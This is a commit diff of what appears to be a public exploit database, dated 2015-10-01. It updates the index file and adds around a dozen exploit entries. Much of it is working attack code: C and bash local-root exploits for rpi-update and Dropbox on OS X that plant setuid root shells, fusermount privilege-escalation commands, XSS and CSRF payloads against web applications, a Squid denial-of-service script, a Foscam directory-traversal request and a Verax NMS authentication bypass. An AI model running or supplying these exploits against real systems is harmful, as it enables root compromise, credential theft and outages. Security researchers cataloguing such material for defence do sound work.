DB: 2015-10-01

14 new exploits

files.csv

@@ -13830,7 +13830,7 @@ id,file,description,date,author,platform,type,port
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
-15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
+15962,platforms/solaris/local/15962.c,"Linux Kernel Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
@@ -28445,7 +28445,7 @@ id,file,description,date,author,platform,type,port
 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter XSS",2008-08-09,Lostmon,php,webapps,0
 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0
 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880
-31574,platforms/arm/local/31574.c,"Linux Kernel - Local Root Exploit (ARM)",2014-02-11,"Piotr Szerman",arm,local,0
+31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 - Local Root Exploit (ARM - Android 4.2.2 / 4.4)",2014-02-11,"Piotr Szerman",arm,local,0
 31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0
 31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778
@@ -32983,7 +32983,7 @@ id,file,description,date,author,platform,type,port
 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
 36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
-36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
+36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
 36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -34642,3 +34642,17 @@ id,file,description,date,author,platform,type,port
 38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-09-29,"Pedro Ribeiro",asp,webapps,0
 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,metasploit,windows,remote,8400
 38353,platforms/linux/local/38353.txt,"Ubuntu Apport - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0
+38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0
+38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting Vulnerability",2013-03-01,CodeV,php,webapps,0
+38356,platforms/hardware/remote/38356.txt,"Foscam Prior to 11.37.2.49 Directory Traversal Vulnerability",2013-03-01,"Frederic Basse",hardware,remote,0
+38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0
+38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting Vulnerability",2013-03-04,"Julien Ahrens",java,webapps,0
+38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
+38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x  - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
+38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
+38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
+38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
+38365,platforms/linux/dos/38365.txt,"Squid 'httpMakeVaryMark()' Function Remote Denial of Service Vulnerability",2013-03-05,tytusromekiatomek,linux,dos,0
+38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0
+38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0
+38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0

platforms/hardware/remote/38356.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58290/info
+
+Foscam is prone to a directory-traversal vulnerability.
+
+Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks. 
+
+GET //../proc/kcore HTTP/1.0

platforms/java/webapps/38358.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58293/info
+
+HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null 

platforms/linux/dos/38365.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/58319/info
+
+Squid is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
+
+Squid 3.2.5 is vulnerable; other versions may also be affected. 
+
+Request
+  -- cut --
+  #!/usr/bin/env python
+  print 'GET /index.html HTTP/1.1'
+  print 'Host: localhost'
+  print 'X-HEADSHOT: ' + '%XX' * 19000
+  print '\r\n\r\n'
+  -- cut --
+
+  Response
+  -- cut --
+  HTTP/1.1 200 OK
+  Vary: X-HEADSHOT
+  -- cut --

platforms/linux/local/37089.txt

@@ -1,5 +1,7 @@
 Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba
 Tweet: https://twitter.com/taviso/status/601370527437967360
+Recommend Reading: http://seclists.org/oss-sec/2015/q2/520
+YouTube: https://www.youtube.com/watch?v=V0i3uJJPJ88
 
 
 
@@ -96,3 +98,20 @@ LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
 # $ sudo umount /tmp/.$$\;/tmp/.$$
 # $ rm -rf /tmp/.$$ /tmp/.$$\;
 #
+
+
+- - - - - - - - - - -
+
+
+$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 755 /tmp/exploit
+$ mkdir -p '/tmp/exploit||/tmp/exploit'
+$ LIBMOUNT_MTAB=/etc/bash.bashrc  _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
+fusermount: failed to open /etc/fuse.conf: Permission denied
+sending file descriptor: Socket operation on non-socket
+$ cat /etc/bash.bashrc
+/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=taviso 0 0
+
+Then simply wait for root to login, or alternatively overwrite
+/etc/default/locale and wait for cron to run a script that sources it.
+That means root wouldn't have to log in, but you would have to wait
+around until midnight to check if it worked.

platforms/linux/local/38357.c

@@ -0,0 +1,94 @@
+source: http://www.securityfocus.com/bid/58292/info
+
+rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability
+
+An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application, bypass certain security restrictions, and perform unauthorized actions. This may aid in further attacks. 
+
+
+/*Local root exploit for rpi-update on raspberry Pi.
+Vulnerability discovered by Technion,  technion@lolware.net
+
+https://github.com/Hexxeh/rpi-update/
+
+
+larry@pih0le:~$ ./rpix updateScript.sh
+[*] Launching attack against "updateScript.sh"
+[+] Creating evil script (/tmp/evil)
+[+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
+[+] Initialize inotify on /tmp/updateScript.sh
+[+] Waiting for root to change perms on "updateScript.sh"
+[+] Opening root shell (/tmp/sh)
+# <-- Yay!
+
+
+Larry W. Cashdollar
+http://vapid.dhs.org
+@_larry0
+
+Greets to Vladz.
+*/
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <sys/inotify.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+
+/*Create a small c program to pop us a root shell*/
+int create_nasty_shell(char *file) {
+  char *s = "#!/bin/bash\n"
+            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
+            "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
+            "chmod 4755 /tmp/sh;\n";
+
+  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
+  write(fd, s, strlen(s));
+  close(fd);
+
+  return 0;
+}
+
+
+int main(int argc, char **argv) {
+  int fd, wd;
+  char buf[1], *targetpath, *cmd,
+       *evilsh = "/tmp/evil", *trash = "/tmp/trash";
+
+  if (argc < 2) {
+    printf("Usage: %s <target file> \n", argv[0]);
+    return 1;
+  }
+
+  printf("[*] Launching attack against \"%s\"\n", argv[1]);
+
+  printf("[+] Creating evil script (/tmp/evil)\n");
+  create_nasty_shell(evilsh);
+
+  targetpath = malloc(sizeof(argv[1]) + 32);
+  cmd = malloc(sizeof(char) * 32);
+  sprintf(targetpath, "/tmp/%s", argv[1]);
+  sprintf(cmd,"/usr/bin/touch %s",targetpath);
+  printf("[+] Creating target file (%s)\n",cmd);
+  system(cmd);
+
+  printf("[+] Initialize inotify on %s\n",targetpath);
+  fd = inotify_init();
+  wd = inotify_add_watch(fd, targetpath, IN_MODIFY);
+
+  printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
+  syscall(SYS_read, fd, buf, 1);
+  syscall(SYS_rename, targetpath,  trash);
+  syscall(SYS_rename, evilsh, targetpath);
+
+  inotify_rm_watch(fd, wd);
+
+  printf("[+] Opening root shell (/tmp/sh)\n");
+  sleep(2);
+  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
+
+  return 0;
+}

platforms/multiple/dos/38364.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/58314/info
+
+Varnish Cache is prone to multiple denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.
+
+Varnish Cache 2.1.5 is vulnerable; other versions may also be affected. 
+
+The following example data is available:
+
+HTTP/1.1 200 OK
+Content-Type: text/xml; charset=utf-8
+Content-Length: 99999999999999999
+
+HTTP/1.1 200 OK
+Content-Length: 2147483647 

platforms/multiple/remote/38368.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/58401/info
+
+McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+McAfee Vulnerability Manager 7.5.0 and 7.5.1 are vulnerable; other versions may also be affected. 
+
+GET /www.example.com/index.exp HTTP/1.1
+Cookie: identity=p805oa53c0dab5vpcv1da30me7;
+cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
+remember=remember
+Host: 172.28.1.1
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
+Accept: */* 

platforms/multiple/webapps/38366.py

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/58334/info
+
+Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.
+
+Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.
+
+Versions prior to Verax NMS 2.1.0 are vulnerable. 
+
+#!/usr/bin/python
+
+ #just based on http://www.example.com/tutorials/general/client.html#basic-example
+ from pyamf import AMF0, AMF3
+ from pyamf.remoting.client import RemotingService
+
+ client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
+amf_version=AMF3)
+ service = client.getService('userService')
+
+ print service.getAllUsers()

platforms/osx/local/38360.txt

@@ -0,0 +1,195 @@
+#!/bin/bash
+
+# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
+# Google Dork: N/A
+# Date: 29/09/15
+# Exploit Author: cenobyte
+# Vendor Homepage: https://www.dropbox.com
+# Software Link: N/A
+# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
+# Tested on: OS X Yosemite (10.10.5)
+# CVE: N/A
+
+#
+#      Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
+#                        <vincitamorpatriae@gmail.com>
+#
+# - vulnerability description:
+# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
+# versions for OS X allows loading of dynamically linked shared libraries
+# that are residing in the same directory. The directory in which
+# FinderLoadBundle is located is owned by root and that prevents placing
+# arbitrary files there. But creating a hard link from FinderLoadBundle to
+# somewhere in a directory in /tmp circumvents that protection thus making it
+# possible to load a shared library containing a payload which creates a root
+# shell.
+#
+# - vulnerable versions: | versions not vulnerable:
+# Dropbox 3.3.* for Mac  | Dropbox 3.10.* for Mac
+# Dropbox 3.1.* for Mac  | Dropbox 3.9.* for Mac
+# Dropbox 3.0.* for Mac  | Dropbox 3.8.* for Mac
+# Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac
+# Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac
+# Dropbox 2.9.* for Mac  | Dropbox 3.5.* for Mac
+# Dropbox 2.8.* for Mac  | Dropbox 3.4.* for Mac
+# Dropbox 2.7.* for Mac  | Dropbox 3.2.* for Mac
+# Dropbox 2.6.* for Mac  | Dropbox 1.5.1-5 for Mac
+# Dropbox 2.5.* for Mac  | Dropbox 1.4.* for Mac
+# Dropbox 2.4.* for Mac  | Dropbox 1.3.* for Mac
+# Dropbox 2.3.* for Mac  |
+# Dropbox 2.2.* for Mac  |
+# Dropbox 2.1.* for Mac  |
+# Dropbox 1.7.* for Mac  |
+# Dropbox 1.6.* for Mac  |
+# Dropbox 1.5.6 for Mac  |
+#
+# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
+# However, there is no mention of this issue at the Dropbox release notes:
+# https://www.dropbox.com/release_notes
+#
+# It seems that one of the fixes implemented in FinderLoadBundle is a
+# check whether the path of the bundle is a root owned directory making it
+# impossible to load arbitrary shared libraries as a non-privileged user.
+# 
+# I am not sure how to find the exact version of the FinderLoadBundle executable
+# but the included Info.plist contained the following key:
+# <key>CFBundleShortVersionString</key>
+# This key is no longer present in the plist file of the latest version. So I
+# included a basic vulnerable version checker that checks for the presence of
+# this key.
+#
+# - exploit details:
+# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
+# used. This exploit relies on Xcode for the shared library + root shell to be
+# compiled. After successful exploitation a root shell is left in a directory in
+# /tmp so make sure you delete it on your own system when you are done testing. 
+#
+# - example:
+# $ ./dropboxfinderloadbundle.sh 
+# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
+#
+# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
+# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
+# [-] constructing bundle
+# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
+# [-] compiling root shell
+# [-] executing FinderLoadBundle using root shell payload
+# [-] entering root shell
+# bash-3.2# id -P
+# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh
+
+readonly __progname=$(basename $0)
+
+errx() {
+	echo "$__progname: $@" >&2
+	exit 1
+}
+
+main() {
+	local -r tmp=$(head -10 /dev/urandom | md5)
+	local -r helpertools="/Library/DropboxHelperTools"
+	local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
+	local -r bundletarget="$bundle/mach_inject_bundle_stub"
+	local -r bundlesrc="${bundletarget}.c"
+	local -r sh="/tmp/$tmp/boomsh"
+	local -r shsrc="${sh}.c"
+	local -r cfversion="CFBundleShortVersionString"
+	local -r findbin="FinderLoadBundle"
+
+	echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
+	echo
+
+	uname -v | grep -q ^Darwin || \
+		errx "this Dropbox exploit only works on OS X"
+
+	[ ! -d "$helpertools" ] && \
+		errx "$helpertools does not exist"
+
+	which -s gcc || \
+		errx "gcc not found"
+
+	found=0
+	for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
+		stat -s "$finder" | grep -q "st_mode=0104"
+		if [ $? -eq 0 ]; then
+			found=1
+			break
+		fi
+	done
+
+	[ $found -ne 1 ] && \
+		errx "couldn't find a setuid root $findbin"
+
+	local -r finderdir=$(dirname $finder)
+	local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"
+	
+	[ -f "$plist" ] || \
+		errx "FinderLoadBundle not vulnerable (cannot open $plist)"
+
+	grep -q "<key>$cfversion</key>" "$plist" || \
+		errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"
+
+	echo "[-] creating temporary directory: /tmp/$tmp"
+	mkdir /tmp/$tmp || \
+		errx "couldn't create /tmp/$tmp"
+
+	echo "[-] linking $finder"
+	ln "$finder" "/tmp/$tmp/$findbin" || \
+		errx "ln $finder /tmp/$tmp/$findbin failed"
+	
+	echo "[-] constructing bundle"
+	mkdir -p "$bundle" || \
+		errx "cannot create $bundle"
+
+	echo "#include <sys/stat.h>" > "$bundlesrc"
+	echo "#include <sys/types.h>" >> "$bundlesrc"
+	echo "#include <stdlib.h>" >> "$bundlesrc"
+	echo "#include <unistd.h>" >> "$bundlesrc"
+	echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
+	echo "void init(void)" >> "$bundlesrc"
+	echo "{" >> "$bundlesrc"
+	echo "	setuid(0);" >> "$bundlesrc"
+	echo "	setgid(0);" >> "$bundlesrc"
+	echo "	chown(\"$sh\", 0, 0);" >> "$bundlesrc"
+	echo "	chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
+	echo "}" >> "$bundlesrc"
+
+	echo "[-] creating $shsrc"
+	echo "#include <unistd.h>" > "$shsrc"
+	echo "#include <stdio.h>" >> "$shsrc"
+	echo "#include <stdlib.h>" >> "$shsrc"
+	echo "int" >> "$shsrc"
+	echo "main()" >> "$shsrc"
+	echo "{" >> "$shsrc"
+	echo "	setuid(0);" >> "$shsrc"
+	echo "	setgid(0);" >> "$shsrc"
+	echo "	system(\"/bin/bash\");" >> "$shsrc"
+	echo "	return(0);" >> "$shsrc"
+	echo "}" >> "$shsrc"
+
+	echo "[-] compiling root shell"
+	gcc "$shsrc" -o "$sh" || \
+	errx "gcc failed for $shsrc"
+
+	gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
+		errx "gcc failed for $bundlesrc"
+
+	echo "[-] executing $findbin using root shell payload"
+	cd "/tmp/$tmp"
+	./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
+	[ $? -ne 4 ] && \
+		errx "exploit failed, $findbin seems not vulnerable"
+
+	[ ! -f "$sh" ] && \
+		errx "$sh was not created, exploit failed"
+
+	stat -s "$sh" | grep -q "st_mode=0104" || \
+		errx "$sh was not set to setuid root, exploit failed"
+	echo "[-] entering root shell"
+
+	"$sh"
+}
+
+main "$@"
+
+exit 0

platforms/php/webapps/38354.txt

@@ -0,0 +1,139 @@
+source: http://www.securityfocus.com/bid/58271/info
+
+Plogger is prone to following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:
+
+1. An SQL-injection vulnerability
+2. Multiple cross-site scripting vulnerabilities
+3. A cross-site request forgery vulnerability
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible.
+
+Plogger 1.0 Rc1 is vulnerable; other versions may also be affected. 
+
++---+[ Feedback.php Sqli ]+---+
+
+Injectable On entries_per_pag Parameter In Feedback.php
+
+http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
+
+p0c
+
+if (isset($_REQUEST['entries_per_page'])) {
+    $_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
+  } else if (!isset($_SESSION['entries_per_page'])) {
+    $_SESSION['entries_per_page'] = 20;
+  }
+.
+.
+.
+$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
+.
+.
+
+// Generate javascript init function for ajax editing
+  $query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
+  $result = run_query($query);
+
++---+[ CSRF In Admin Panel ]+---+
+
+Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..
+
++---+[ XSS ]+---+
+
+Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
+And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..
+
+XSS
+http://www.example.com/plogger/plog-admin/plog-feedback.php
+Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.
+
+
+Uploading the File and enter name to any XSS Vector..
+
+http://www.example.com/plogger/plog-admin/plog-upload.php
+
+It Can Me Exploit IN Many Ways LIke
+CSRF + SQLI inside Admin panel..which Is define above.
+
+XSS In Edit Comment.CSRF + XSS
+
+<html>
+<head>
+<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
+    <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
+    <div>
+      <div class="strong">Edit Comment</div>
+      <p>
+        <label class="strong" accesskey="a" for="author">Author:</label><br />
+        <input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
+      </p>
+      <p>
+        <label class="strong" accesskey="e" for="email">Email:</label><br />
+        <input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
+      </p>
+      <p>
+        <label class="strong" accesskey="u" for="url">Website:</label><br />
+        <input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
+      </p>
+      <p>
+        <label class="strong" accesskey="c" for="comment">Comment:</label><br />
+        <textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script>&lt;/textarea&gt;
+      </p>
+      <input type="hidden" name="pid" value="4" />
+      <input type="hidden" name="action" value="update-comment" />
+      <input class="submit" name="update" value="Update" type="submit" />
+      <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
+    </div>
+  </form>
+
+
+Another XSS
+http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
+Edit Caption To XSS Vector Inside Admin PAnel..
+Again CSRF + XSS
+<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
+      <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
+      <div>
+        <div class="strong">Edit Image Properties</div>
+        <p>
+          <label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
+          <input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
+        </p>
+        <p>
+          <label class="strong" for="description">Description:</label><br />
+          <textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script>&lt;/textarea&gt;
+        </p>
+        <p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
+        <input type="hidden" name="pid" value="1" />
+        <input type="hidden" name="action" value="update-picture" />
+        <input class="submit" name="update" value="Update" type="submit" />
+        <input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
+      </div>
+    </form>
+
+
+CSRF Admin Password Reset And XSS
+
+plog-options.php
+
+<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
+<table class="option-table" cellspacing="0">
+<tbody><tr class="alt">
+<td class="left"><label for="admin_username"></label></td>
+<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
+</tr>
+<tr>
+<td class="left"><label for="admin_email"></label></td>
+<td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
+</tr>
+<tr class="alt">
+<td class="left"><label for="admin_password"></label></td>
+<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
+<tr>
+<td class="left"><label for="confirm_admin_password"></label></td>
+<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
+</tr>
+<td class="left"><label for="gallery_url"></label></td>
+            <td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
+</tbody></table>
+<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>

platforms/php/webapps/38355.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58285/info
+
+The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Uploader 1.0.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E 

platforms/php/webapps/38359.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58307/info
+
+The Count Per Day plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Count Per Day 3.2.5 and prior versions are vulnerable. 
+
+http://www.example.com/wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1... /daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show

platforms/php/webapps/38363.txt

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/58313/info
+
+File Manager is prone to an HTML-injection vulnerability and a local file-include vulnerability.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, steal cookie-based authentication credentials and open or run arbitrary files in the context of the web server process. Other attacks are also possible.
+
+File Manager 1.2 is vulnerable; other versions may also be affected. 
+
+Local file-include:
+
+
+<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
+<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
+<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
+<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
+<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
